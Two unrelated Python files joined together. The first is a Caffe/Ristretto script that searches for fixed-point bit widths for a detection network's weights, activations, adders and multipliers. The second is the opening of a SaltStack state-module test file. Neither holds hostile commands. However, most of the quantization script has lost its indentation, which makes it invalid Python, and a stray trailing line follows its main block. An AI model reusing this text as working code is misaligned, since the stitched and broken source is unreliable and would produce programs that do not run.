if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
#print layer.type, layer.name, net_output_IL[layer.name],net_input_IL[layer.name]
return net_output_IL, net_input_IL
#calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
layer_adder_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[0],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[1],
key=abs))
return math.ceil(math.log(layer_adder_max, 2)) + 1
#calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
layer_multiplier_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[2],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[3],
key=abs))
return math.ceil(math.log(layer_multiplier_max, 2)) + 1
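# Note (assumption): the two helpers above read fixed offsets [0],[1] (adder)
# and [2],[3] (multiplier) of the flattened top blob, which presumes the
# ConvolutionIVS/FcIVS layers in analyze_mode stash their accumulator
# statistics in those slots instead of ordinary activations.
# Worked example with a hypothetical recorded adder maximum of 1000.0:
#   ceil(log2(1000)) + 1 = 10 + 1 = 11 integer bits.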
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_adder_IL = dict()
net_multiplier_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' :
            assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
            net_adder_IL[layer.name] = -sys.maxint - 1
            net_multiplier_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
        # set one weight to a large sentinel value (2610214), presumably so the
        # following forward pass drives the analysis-mode layers to record
        # worst-case adder and multiplier magnitudes
        if layer.type == 'ConvolutionIVS':
            net.params[layer.name][0].data[0][0][0][0] = 2610214
        elif layer.type == 'FcIVS':
            net.params[layer.name][0].data[0][0] = 2610214
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
net_adder_IL[layer.name])
net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
net_multiplier_IL[layer.name])
return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
adder_IL = net_adder_IL[layer.name] + extra_IL
adder_FL = adder_bw - adder_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
adder_bw, adder_FL, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
multiplier_IL = net_multiplier_IL[layer.name] + extra_IL
multiplier_FL = multiplier_bw - multiplier_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
multiplier_bw, multiplier_FL, \
)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
    input_bw = output_bw
#input_FL = 0;
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
if layer.name =='layer1-conv':
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name]
input_FL = input_bw - input_IL
#elif layer.name =='layer15-conv':
# output_IL = net_output_IL[layer.name]
# output_FL = output_bw - output_IL
# input_IL = net_input_IL[layer.name] + extra_IL
# input_FL = input_bw - input_IL
else:
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name] + extra_IL
input_FL = input_bw - input_IL
#if layer.name=='conv1_1/conv':
# print input_IL,output_IL
#print layer.name
#if layer.name == 'conv1_1/conv':
# print output_IL
# continue
change_layer_bw(net_proto, layer.name, \
input_bw, input_FL, \
output_bw, output_FL, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#input_FL = output_FL
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'FcIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'DeconvolutionRistretto':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
net_proto = caffe_pb2.NetParameter()
    fn = ori_net_path
with open(fn) as f:
s = f.read()
txtf.Merge(s, net_proto)
return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
outf = out_net_path
#print 'writing', outf
with open(outf, 'w') as f:
f.write(str(net_proto))
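# Minimal round-trip sketch showing how the helpers above compose; the
# function name, paths, and the 8-bit / -1 settings are illustrative
# assumptions, not values used by the pipeline below.
def quantize_conv_to_8bit_example(src_prototxt, dst_prototxt, net_param_IL):
    net_proto = read_from_prototxt(src_prototxt)       # parse NetParameter text
    quantize_net_conv(net_proto, net_param_IL, 8, -1)  # 8-bit conv weights
    write_to_prototxt(net_proto, dst_prototxt)         # serialize back to text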
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
net.name = os.path.splitext(os.path.basename(caffemodel_path))[0]
ap = test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
return ap
#print each layer name and spec
def print_net_layer_names(net):
print("Network layers:")
for name, layer in zip(net._layer_names, net.layers):
if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
            print dir(layer)
            print layer.reshape
            print layer.convolution_param
    # pycaffe's Net object has no .layer attribute (that lives on the parsed
    # NetParameter), so this debug line is disabled:
    #print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
#caffe.set_mode_cpu()
#GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
#cfg.GPU_ID = GPU_ID
#caffe.set_device(GPU_ID)
#caffe.set_mode_gpu()
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
ap_string = check_output('./caffe-fast-rcnn/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True)
ap = 0.
if len(ap_string) != 0:
ap = float(ap_string)
#ap = float(check_output('./caffe-fast-rcnn-c3d/caffe-fast-rcnn-2/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True))
#ap = test_qnet(net_path, args.caffemodel, imdb)
#ap = test_qnet(net_path, args.caffemodel, imdb)
shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
#caffe.set_mode_cpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_output_IL_, net_input_IL_ = analyze_net_output_IL(net, net_proto)
for t in net_output_IL_.keys():
net_output_IL[t] = net_output_IL_[t]
for t in net_input_IL_.keys():
net_input_IL[t] = net_input_IL_[t]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
#caffe.set_mode_cpu()
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_adder_IL_, net_multiplier_IL_ = analyze_net_adder_multiplier_IL(net_BAC, net_proto_BAC)
for t in net_adder_IL_.keys():
net_adder_IL[t] = net_adder_IL_[t]
for t in net_multiplier_IL_.keys():
net_multiplier_IL[t] = net_multiplier_IL_[t]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
net_param_IL_ = analyze_net_param_IL(net, net_proto)
for t in net_param_IL_.keys():
net_param_IL[t] = net_param_IL_[t]
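# The main block below scans candidate bit widths linearly, two at a time on
# two GPUs; the commented-out blocks further down sketch a bisection search
# instead. A minimal self-contained version of that bisection, assuming a
# hypothetical eval_fn(bw) -> accuracy callable and a full-precision baseline
# full_ap (never called by this script):
def bisect_min_bitwidth(eval_fn, full_ap, error_margin, bw_h=16, bw_l=0):
    bw = bw_h
    while True:
        ap = eval_fn(bw)
        if ap < (full_ap - error_margin):
            bw_l = bw  # too aggressive: accuracy dropped, raise lower bound
        else:
            bw_h = bw  # accurate enough, shrink upper bound
        if bw_h - bw_l <= 1:
            # smallest width that met the margin (bw_h is returned unchanged
            # if even the initial width failed and the range collapses)
            return bw_h
        bw = bw_l + (bw_h - bw_l) // 2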
if __name__ == '__main__':
args = parse_args()
num_iters = 5000
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
print('Using config:')
pprint.pprint(cfg)
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
print 'Create quantized prototxt'
print 'Testing Full Precision Accuracy'
manager = multiprocessing.Manager()
shared_dict = manager.dict()
GPU1 = 3
GPU2 = 3
#p = multiprocessing.Process(target=mAP_worker, args=('FP-FP-FP-FP-FP', args.prototxt, shared_dict, GPU1))
timer = Timer()
timer.tic()
#p.start()
#p.join()
timer.toc()
print ('Took {:.3f}s').format(timer.total_time)
#full_ap = shared_dict['FP-FP-FP-FP-FP']
full_ap = 0.334307
print 'Full precision accuracy : {}'.format(full_ap)
# Bit Width for Analyze
bw_range_conv = [8, 4] #bit width for convolution layers
bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
bw_conv = 8 #just initial
bw_deconv = 0 #just initial
bw_fc = 0 #just initial
    bw_output = 8 #just initial
bw_adder = 12 #just initial
bw_multiplier = 12 #just initial
convIL_reduction = -1
deconvIL_reduction = 0
fcIL_reduction = 0
actIL_reduction = -2
adderIL_reduction = 0
multIL_reduction = 0
print 'Analyzing network'
net_proto = read_from_prototxt(args.prototxt)
has_conv, has_deconv, has_fc = analyze_network(net_proto)
print 'Network Structure'
print 'CONV:{}, DECONV:{}, FC:{}'.format(has_conv, has_deconv, has_fc)
print '-----------------------------------'
net_proto = read_from_prototxt(args.prototxt_quantized)
print 'Analyzing network parameter IL'
net_param_IL = manager.dict()
p = multiprocessing.Process(target=analyze_net_param_IL_worker,
args=(net_param_IL, GPU1, ))
p.start()
p.join()
with open('param_analysis.json', 'w') as outfile:
param_analysis = dict()
param_analysis['net_param_IL'] = dict()
for t in net_param_IL.keys():
param_analysis['net_param_IL'][t] = net_param_IL[t]
json.dump(param_analysis, outfile)
net_output_IL = manager.dict()
net_input_IL = manager.dict()
if args.act_analysis == None:
print 'Analyzing network output IL'
p = multiprocessing.Process(target=analyze_net_output_IL_worker,
args=(net_output_IL, net_input_IL, GPU1))
p.start()
p.join()
with open('act_analysis.json', 'w') as outfile:
act_analysis = dict()
act_analysis['net_output_IL'] = dict()
act_analysis['net_input_IL'] = dict()
for t in net_output_IL.keys():
act_analysis['net_output_IL'][t] = net_output_IL[t]
for t in net_input_IL.keys():
act_analysis['net_input_IL'][t] = net_input_IL[t]
json.dump(act_analysis, outfile)
else:
print 'Loading network output IL'
with open(args.act_analysis) as json_data:
act_analysis = json.load(json_data)
for t in act_analysis['net_output_IL'].keys():
net_output_IL[t] = act_analysis['net_output_IL'][t]
for t in act_analysis['net_input_IL'].keys():
net_input_IL[t] = act_analysis['net_input_IL'][t]
#Make Final Quantized Prototxt
print 'Final Quantization Testing'
net_proto = read_from_prototxt(args.prototxt_quantized)
quantize_net_conv(net_proto, net_param_IL, bw_conv, convIL_reduction)
#quantize_net_deconv(net_proto, net_param_IL, bw_conv, deconvIL_reduction)
#quantize_net_fc(net_proto, net_param_IL, bw_fc, fcIL_reduction)
quantize_net_output(net_proto, net_output_IL, net_input_IL, bw_output, actIL_reduction)
write_to_prototxt(net_proto, './temp.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-32-32', './temp.prototxt',
shared_dict, GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-32-32']
layer_ap = ap
#ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit CONV, {}bit FC, {}bit layer output'.format(bw_conv, bw_fc, bw_output)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print 'Please fine-tune'
write_to_prototxt(net_proto, args.prototxt_quantized)
print 'Quantized Model saved to', args.prototxt_quantized
    sys.exit(0)  # early exit: the bit-accurate (BAC) adder/multiplier analysis below is currently skipped
print 'Create Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Bit-Accurate quantized prototxt'
#print 'Analyzing network adder and multiplier'
net_adder_IL = manager.dict()
net_multiplier_IL = manager.dict()
if args.accumulator_analysis == None:
print 'Analyzing network adder and multiplier'
p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
args=(net_adder_IL, net_multiplier_IL, GPU1))
p.start()
p.join()
with open('accumulator_analysis.json', 'w') as outfile:
accumulator_analysis = dict()
accumulator_analysis['net_adder_IL'] = dict()
accumulator_analysis['net_multiplier_IL'] = dict()
for t in net_adder_IL.keys():
accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
for t in net_multiplier_IL.keys():
accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
json.dump(accumulator_analysis, outfile)
else:
print 'Loading network adder and multiplier analysis file'
with open(args.accumulator_analysis) as json_data:
accumulator_analysis = json.load(json_data)
for t in accumulator_analysis['net_adder_IL'].keys():
net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
for t in accumulator_analysis['net_multiplier_IL'].keys():
net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
print 'Analyzing layer multiplier'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
bw_multiplier = j
not_found = False
                break
i = i + 2
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer multiplier'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_multiplier(net_BAC, net_proto_BAC, net_multiplier_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_multiplier = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Analyzing layer adder'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
bw_adder = j
not_found = False
                break
i = i + 2
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer adder'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_adder(net_BAC, net_proto_BAC, net_adder_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_adder = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Create Final Bit-Accurate quantized prototxt'
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Final Bit-Accurate quantized prototxt'
quantize_net_conv(net_proto_final, net_param_IL, bw_conv, convIL_reduction)
quantize_net_deconv(net_proto_final, net_param_IL, bw_conv, deconvIL_reduction)
quantize_net_fc(net_proto_final, net_param_IL, bw_fc, fcIL_reduction)
quantize_net_output(net_proto_final, net_output_IL, net_input_IL, bw_output, actIL_reduction)
quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
write_to_prototxt(net_proto_final, './temp_f.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
shared_dict,GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
#ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print '{}bit adder'.format(bw_adder)
print '{}bit multiplier'.format(bw_multiplier)
print 'Please fine-tune'
write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
    GPU_ID = 2 # GPU device id to use.
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import shutil
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.unit import skipIf
from tests.support.paths import TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
import logging
log = logging.getLogger(__name__)
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_catch_recurse(self):
'''
        state.sls should catch a recursive requisite reference
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
def test_issue_1896_file_append_source(self):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(TMP, 'test.append')
if os.path.isfile(testfile):
os.unlink(testfile)
ret = self.run_function('state.sls', mods='testappend')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-1')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-2')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(
contents, testfile_contents)
# Re-append switching order
ret = self.run_function('state.sls', mods='testappend.step-2')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-1')
self.assertSaltTrueReturn(ret)
